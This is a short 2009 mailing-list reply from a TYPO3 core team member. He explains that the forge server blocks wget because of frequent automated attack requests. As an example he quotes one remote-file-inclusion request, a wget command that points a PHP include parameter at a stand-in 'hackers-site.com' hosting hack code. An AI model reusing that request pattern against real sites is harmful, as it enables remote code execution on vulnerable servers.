[TYPO3-typo3org] Downloading patches from forge with wget not possible

Dmitry Dulepov dmitry at typo3.org
Sat Apr 4 13:47:27 CEST 2009

Hi!

Steffen Müller wrote:
> Not enough obscurity, so not very effective...
> And now its disclosed. Sorry for that. :)
>
> But the measure hurts more than it helps.

I agree that it hurts :) But you will be surprised how many request come from Asia with "wget http://example.com/admin.php?include=http://hackers-site.com/hack-code.txt" or so. It does not affect TYPO3 but some people prefer to block wget than have Apache process all this junk.

Again: I understand it is not the best solution.

As Sebastian, may be he can unblock wget.

--
Dmitry Dulepov
TYPO3 core team